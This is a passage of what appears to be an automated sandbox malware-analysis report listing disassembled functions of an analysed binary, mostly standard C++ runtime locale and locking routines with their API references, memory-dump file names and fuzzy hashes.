                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D73F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 712880209-0
                                                                                                                                                                        • Opcode ID: 5f87fc3a4a6ddf2d5a3316ec87a3fddd45b3530befbb5103fc66b4806ca616d1
                                                                                                                                                                        • Instruction ID: 360615233922cea01aa10b4ec6bf242756ccb5a8321d3f35ba88475999d20ddc
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f87fc3a4a6ddf2d5a3316ec87a3fddd45b3530befbb5103fc66b4806ca616d1
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D019E35900619DBCB15FB64EC41ABE7BB1BF84730F250909F914AB2D2CF789E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42678 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4267F
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42689
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • messages.LIBCPMT ref: 00F426C3
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F426DA
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F426FA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2750803064-0
                                                                                                                                                                        • Opcode ID: 6db0bfbb12c82b7c20b93c57e6df71a3bd6bbc8400b51fe9a50af610b25041fb
                                                                                                                                                                        • Instruction ID: 1f06e821dc248e3c11f7a7fa2646ab66b5a2c108001eb6143e31461e823eb404
                                                                                                                                                                        • Opcode Fuzzy Hash: 6db0bfbb12c82b7c20b93c57e6df71a3bd6bbc8400b51fe9a50af610b25041fb
                                                                                                                                                                        • Instruction Fuzzy Hash: 8701C031900619DFCB05FB64CC41ABE7B60AF84720F254459F910AB2D2DF789E05BB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4E8D8 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4E8DF
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E8E9
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • messages.LIBCPMT ref: 00F4E923
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4E93A
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E95A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2750803064-0
                                                                                                                                                                        • Opcode ID: b7e9d97f8df1a78ef247cfa857ea181e1f833efa937f6eb0ca90a9757d4d3689
                                                                                                                                                                        • Instruction ID: dfa706a8e1db87256e0b0976a30cd41c4509a8f88bf6616b9c363387b7360433
                                                                                                                                                                        • Opcode Fuzzy Hash: b7e9d97f8df1a78ef247cfa857ea181e1f833efa937f6eb0ca90a9757d4d3689
                                                                                                                                                                        • Instruction Fuzzy Hash: A3019232900619DFCB05EB64DC45ABE7BA1BF84720F250549F914AB3D2CF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4E843 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4E84A
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E854
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • collate.LIBCPMT ref: 00F4E88E
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4E8A5
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E8C5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1007100420-0
                                                                                                                                                                        • Opcode ID: 0a1363b2f647e6ad0563c44271dc30627de41ab01c1c28bfe5699dda676bb79f
                                                                                                                                                                        • Instruction ID: f49a8e6202a865fc72228f7b903ef61f051d3802e79267395cc716cb00c1841d
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a1363b2f647e6ad0563c44271dc30627de41ab01c1c28bfe5699dda676bb79f
                                                                                                                                                                        • Instruction Fuzzy Hash: 65018036900619DFCB05FB649C41ABE7BB1BF84720F244409F914AB2D2DF789E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F429F6 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F429FD
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42A07
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F42A41
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42A58
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42A78
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: b4bfa00f9b75752fd066a7383acd79acdccb639f2a7aedb8337a41436faceb93
                                                                                                                                                                        • Instruction ID: 9221d27173f021c500df3549786e5f7e8097008234ce23dbca46ad121f0cf331
                                                                                                                                                                        • Opcode Fuzzy Hash: b4bfa00f9b75752fd066a7383acd79acdccb639f2a7aedb8337a41436faceb93
                                                                                                                                                                        • Instruction Fuzzy Hash: E701DE31900229DBCB15EF64CC41ABE7BA1AF84760F250419FD10AB2D2CF7C9E06AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42961 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42968
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42972
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F429AC
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F429C3
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F429E3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: 38b473b293f0a1e5079636c7748f537a01530b71456fb1af62c08acac2922792
                                                                                                                                                                        • Instruction ID: 52a00d07e30ed0c8e20e179b87849d418ee17c12e2df70e341de320cda09da71
                                                                                                                                                                        • Opcode Fuzzy Hash: 38b473b293f0a1e5079636c7748f537a01530b71456fb1af62c08acac2922792
                                                                                                                                                                        • Instruction Fuzzy Hash: EF01DE31900619DBCB05FB64CC42ABE7BB0AF84760F250519FE10AB2D2DF789E01BB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4EA97 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4EA9E
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EAA8
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F4EAE2
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4EAF9
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EB19
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: ea5e648ea9b80fa012a4b034435cda382e359fb5608416654a9a6099160e6283
                                                                                                                                                                        • Instruction ID: b281adae24c4db52aee324dac37c864dabc505fedf6089f21a348ff45e603692
                                                                                                                                                                        • Opcode Fuzzy Hash: ea5e648ea9b80fa012a4b034435cda382e359fb5608416654a9a6099160e6283
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C01C032D00619DBCB15EB649C41ABE7B71FF80760F240849F9056B2D2DF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42A8B Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42A92
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42A9C
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F42AD6
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42AED
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42B0D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: 81d3e2c4038ec22f5e46ad340f6d8eea53e6cd350afef3c64ecfa704b04a3064
                                                                                                                                                                        • Instruction ID: 834fc202669dd32b31d659a519762b42608f331e6528535959f4e4bf5d300d4e
                                                                                                                                                                        • Opcode Fuzzy Hash: 81d3e2c4038ec22f5e46ad340f6d8eea53e6cd350afef3c64ecfa704b04a3064
                                                                                                                                                                        • Instruction Fuzzy Hash: FF01C031900619DFCB15FB649C41ABE7BA1AF84760F244819FE04AB2D2CF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42B20 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42B27
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42B31
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F42B6B
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42B82
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42BA2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: 76988b67e4eed8058e6a3856c7fca6d6ca02cab3b2b1f981ba7b3bac503e3aed
                                                                                                                                                                        • Instruction ID: a2cdcb8d32d5493a3e35792572cd0b1e15385bb6ee44fb9f8c29c57560444de1
                                                                                                                                                                        • Opcode Fuzzy Hash: 76988b67e4eed8058e6a3856c7fca6d6ca02cab3b2b1f981ba7b3bac503e3aed
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D01C035900619DBCB15EB648C416BE7B71BF84730F250419F9046B3D2CFB89E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4EB2C Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4EB33
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EB3D
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F4EB77
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4EB8E
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EBAE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: 0f7ea4dd7a15a73f1f115e170cddee11103ec7e877b21c703563dd99323bea5b
                                                                                                                                                                        • Instruction ID: 829ee2d2ffada055fc4b3635ea8e59731646f7b94978080332f4cba09924a5f7
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f7ea4dd7a15a73f1f115e170cddee11103ec7e877b21c703563dd99323bea5b
                                                                                                                                                                        • Instruction Fuzzy Hash: B401C031900619DFCB05FB64DC816BE7B60BF84720F250809F9156B2D2CF789E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42D74 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42D7B
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42D85
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • numpunct.LIBCPMT ref: 00F42DBF
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42DD6
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42DF6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 743221004-0
                                                                                                                                                                        • Opcode ID: aefaed08abefdd302769745351384ee1b149a6b855a67890bb8581cab3b0e9a4
                                                                                                                                                                        • Instruction ID: 195e94bb535abc7bf1ba1e108e06cbb10ba6e26959df14583be27ebe6be3c4ca
                                                                                                                                                                        • Opcode Fuzzy Hash: aefaed08abefdd302769745351384ee1b149a6b855a67890bb8581cab3b0e9a4
                                                                                                                                                                        • Instruction Fuzzy Hash: E601C031D00219DBCB05EBA4DC416BEBBB0BF84720F650819F914AB2D2DF789E01BB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F52C4E Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                        • RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                        • SetEvent.KERNEL32(?,00F32427,00F8E638,00F76B40), ref: 00F52D0C
                                                                                                                                                                        • ResetEvent.KERNEL32(?,00F32427,00F8E638,00F76B40), ref: 00F52D18
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3916383385-0
                                                                                                                                                                        • Opcode ID: 97d720923773ec33fda3d0c37d3799586f98b0e4defc01b07b26218c6b11d453
                                                                                                                                                                        • Instruction ID: c7aaa777f6d77da126810d25d0f6d3a47c55f80c20f21c35eeb58f6650cdb740
                                                                                                                                                                        • Opcode Fuzzy Hash: 97d720923773ec33fda3d0c37d3799586f98b0e4defc01b07b26218c6b11d453
                                                                                                                                                                        • Instruction Fuzzy Hash: 27014632A14228DFC715AF18FC08AE9BB65FF49761701446AF90683371DB705841FBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3BB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000018,72A902E8,?,00000000), ref: 00F3BBA3
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00F3BD7F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
